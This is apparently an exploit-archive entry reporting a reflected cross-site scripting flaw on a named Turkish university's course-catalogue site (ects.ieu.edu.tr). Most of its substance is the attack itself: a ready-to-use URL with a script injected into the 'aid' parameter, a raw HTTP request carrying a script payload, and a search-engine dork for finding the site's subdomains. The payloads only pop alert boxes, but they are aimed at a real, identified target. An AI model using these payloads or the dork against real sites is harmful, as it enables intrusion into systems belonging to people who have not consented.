izmir ekonomi üniversitesi XSS

2020.01.20

Anonymous7480 (TR)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Dork: site:ieu.edu.tr -www

# Exploit Title: izmir ekonomi üniversitesi XSS
# Date: 20.01.2020
# Exploit Author: Furkan Özer
# Vendor Homepage: https://ects.ieu.edu.tr/
Link##: https://ects.ieu.edu.tr/new/akademik.php?aid=%22%3E%3CScRipT%3Ealert(document.domain);%3C/ScRipT%3E
# PoC
GET //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

izmir ekonomi üniversitesi XSS

Dork: site:ieu.edu.tr -www

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.